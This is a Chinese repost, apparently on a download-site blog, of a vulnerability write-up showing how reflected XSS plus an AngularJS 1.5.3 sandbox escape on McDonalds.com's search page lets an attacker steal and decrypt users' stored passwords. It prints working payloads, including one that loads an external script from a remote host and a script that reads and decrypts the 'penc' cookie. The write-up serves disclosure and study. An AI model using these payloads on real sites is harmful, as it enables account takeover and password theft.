[Web漏洞] 看我如何利用漏洞窃取麦当劳网站注册用户密码
作者:CC下载站 日期:2020-10-30 03:23:39 浏览:1382 分类:web
本文讲述了利用不安全的加密存储(Insecure_Cryptographic_Storage)漏洞和服务端反射型XSS漏洞,实现对麦当劳网站(McDonalds.com)注册用户的密码窃取,进一步测试,还可能获取到网站注册用户的更多信息。
POC-利用反射型XSS漏洞绕过AngularJS框架沙箱
麦当劳网站McDonalds.com设置有一个搜索页面,该页面存在XSS反射型漏洞,可以返回搜索参数值,假设搜索参数q为***********-test-reflected-test-***********,对应链接:
http://www.mcdonalds.com/us/en-us/search-results.html?q=***********-test-reflected-test-***********
则执行效果如下:
麦当劳网站采用AngularJS框架,所以可以使用特殊字符在搜索区域进行返回值尝试。通过更改搜索参数q为{{$id}}之后,发现返回值对应AngularJS范围内的对应ID数字9:
Link used: http://www.mcdonalds.com/us/en-us/search-results.html?q={{$id}}
AngularJS是一个流行的JavaScript框架,通过这个框架可以把表达式放在花括号中嵌入到页面中。例如,表达式1+2={{1+2}}将会得到1+2=3。其中括号中的表达式被执行了,这就意味着,如果服务端允许用户输入的参数中带有花括号,我们就可以用Angular表达式来进行xss攻击。
由于AngularJS工作在沙箱模式,所以使用参数{{alert(1)}}无任何返回信息,但这并不代表AngularJS沙箱没有漏洞。在 AngularJS1.6版本中,由于沙箱机制不能很好地起到安全防护目的,已经被从源码中移除。而PortSwigger还对AngularJS的各版本沙箱进行了绕过测试,并给出了相应绕过执行命令。
在这里,我们来看看McDonalds.com使用的AngularJS版本,通过在浏览器控制端输入angular.version命令:
可以发现AngularJS为1.5.3版本,参照PortSwigger的测试,我们选用
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
作为搜索参数,很惊喜,返回值如下:
这就意味着,我们可以利用绕过命令,对网站加载外部JS脚本文件,如构造如下命令:
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=$.getScript(`http://finnwea.com/snippets/external-alert.js`)');}}`
返回结果如下:
在内容安全策略(Content-Security-Policy)的提示下,第三方脚本文件被成功加载。
窃取密码
除此之外,我在麦当劳网站的注册页面发现了复选框“Remember my password”,通常来说,这只有在用户登录页面才存在,有点奇怪:
在该页面的源代码页面,包含了各种passowrd字段内容,甚至存在一个有趣的密码解密函数:
最危险的是,利用该解密函数代码竟然可以实现对客户端或双向加密存储的密码破解。尝试对发现的被存储Cookie值penc进行解密,竟然成功了!
而且,经分析发现,Cookie值penc的存储期限是大大的一年!LOL!
另外,以下的源码分析显示,麦当劳网站使用了Javascript的CryptoJS加密库进行信息加密,加密方式为3DES,其中加密参数key和iv都为通用,这意味着只需要获取到cookie值就能对密码解密:
由于AngularJS沙箱绕过方法只对charAt的join方法(charAt=[].join;$eval(‘x=alert(1)’))有效,所以即使我曾尝试在搜索区域构造其它恶意命令对cookie信息进行解密,但最终总是因为getCookie失败而无效。只有当charAt(0) 不为空时,getCookie才有返回值:
最后,我写了一段调用麦当劳网站首页框架进行cookie窃取的脚本,为了避免脚本因AngularJS沙箱被绕过而被反复执行,所以,我用window.xssIsExecuted对其进行了显示控制,如下:
if (!window.xssIsExecuted) {window.xssIsExecuted = true;var iframe = $('<iframe src="http://www.mcdonalds.com/us/en-us.html"></iframe>'); $('body').append(iframe); iframe.on('load', function() {var penc = iframe[0].contentWindow.getCookie('penc'); alert(iframe[0].contentWindow.decrypt(penc)); }); }
最终,配合以下AngularJS沙箱绕过命令,可以成功从cookie信息中对密码解密!
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=$.getScript(`http://finnwea.com/snippets/mcdonalds-password-stealer.js`)');}}
遗憾的是,我曾多次与麦当劳官方就此问题进行联系,但是他们竟然都不回应!@#%¥&! ,所以我选择把此漏洞公开。
猜你还喜欢
- 04-01 [科学上网] 直连、中转、专线机场有什么区别|良心高效专线机场推荐|hy2机场推荐
- 03-29 [web] 免费公共DNS大全(IPv6+IPv4)
- 03-29 [玩技术] CTFHUB刷题笔记
- 03-22 [AI配音] 有哪些好用的AI智能配音工具值得推荐?
- 03-15 [web] 轻松申请免费域名并绑定到个人网站 | link顶级域名
- 03-15 [运营] 亚马逊如何选品?产品市场分析怎么做?包括哪些方面?
- 03-15 [web] 3分钟,免费拥有你的专属域名——免费一级域名注册申请及域名解析教程
- 03-14 [学习] 必看!手把手教你自动续期微软E5账号,长期畅享5T OneDrive云盘!
- 03-14 [学习] 白嫖5T微软的OneDrive云盘,微软E5申请,真正的免费不限速!
- 03-14 [学习] 微软onedrive E5创建子账号,实现125T云盘空间25账号,附带Office365激活
- 03-08 [web] 手把手教你开通新加坡华侨银行OCBC账户-保姆级教程
- 03-05 [web] PT站是什么?开放注册的国外国内PT站推荐汇总
取消回复欢迎 你 发表评论:
- 精品推荐!
-
- 最新文章
- 热门文章
- 热评文章
[美食] 美味糖醋排骨做法教程大揭秘!小孩大人都爱吃
[健康加油站] 这8种绿叶蔬菜,钙含量比牛奶高,已大量上市,建议中老年要多吃
[美食网文] 餐饮洞察:淄博烧烤爆红背后的秘密
[游戏攻略] 2024年4月16日ルシエル探索区域攻略示意图
[AI软件] RWKV Runner-开箱即用的AI软件-聊天 写作 作曲一键完成
[AI写作] WriteWise最强小说Ai自动写作工具,内置Ai模型
[文字识别] 一键OCR提取文字v0.0.0.71 截屏 / 翻译【生产力小工具】极简操作
[文件传输] 跨平台局域网文件传输工具【闪电藤2.1.8】全新界面
[系统安全] 零度还原v1.2.6.1294——一款免费的重启还原软件,类似冰点还原
[爬虫工具] 可视化爬虫软件 EasySpiderV0.6 开源免费无广告
[资料] [大学期末救急课] 猴博士+高斯课堂+斐多课堂,全集视频合集
[云资源] 价值2万元的老男孩Python教程
[书库] 史上最全摄影书推荐(附700本PDF版打包下载)
[云资源] 花了一千多元买的私人健身教程
[下载工具] Internet Download Manager 6.42.7 (IDM)
[影视] 灌篮高手 WEB-DL版下载/Slam Dunk/スラムダンク/灌篮高手:THE FIRST/灌篮高手电影版 2022 The First Slam Dunk 61.35G
[即时通讯] 腾讯QQ PC版9.7.22.29315去广告绿色纯净版
[开发环境] PhpStorm2023中文激活版v2023.3.3 正式版
[资料] 3000 套电影电视剧 LOGO 宣传片常用音效合集包
[安卓软件] 酷我音乐APP_v10.7.6.4 去广告破解豪华VIP版
[云资源] 价值2万元的老男孩Python教程
[影视] 灌篮高手 WEB-DL版下载/Slam Dunk/スラムダンク/灌篮高手:THE FIRST/灌篮高手电影版 2022 The First Slam Dunk 61.35G
[云资源] 花了一千多元买的私人健身教程
[书库] 史上最全摄影书推荐(附700本PDF版打包下载)
[资料] 抗战阵亡将士资料+续编
[电视剧] 三体 (2024) 全8集 网飞版本 中文字幕 合集
[剧集] 繁花 (2023)[全30集][打包]
[影视] 三大队 WEB-DL版下载/Endless Journey/请转告局长,三大队任务完成了 2023 三大队 6.7G
[纪录片] 河西走廊【10集 国语 中文字幕 1080P 10.8G MP4】
[安卓软件] OfficeSuite中文版APP v14.2.50872.0破解版
- 最新评论
-
谢谢楼主xiaoqi 评论于:04-12 勿在线解压,勿手机解压,请在电脑上用最新款压缩软件解压!推荐360压缩或者好压CC下载站 评论于:04-10 无法解压啊,客服能不能给个解压教程ravengrey 评论于:04-10 谢谢支持!!CC下载站 评论于:03-26 很棒的资源,感谢分享云体风身 评论于:03-26 感谢分享,好东西云体风身 评论于:03-26 谢谢支持!CC下载站 评论于:03-14 央视精品,感谢付出提供。qwer9009 评论于:03-14 谢谢支持!!!CC下载站 评论于:03-13 谢谢分享!Ypc9182 评论于:03-12
- 热门tag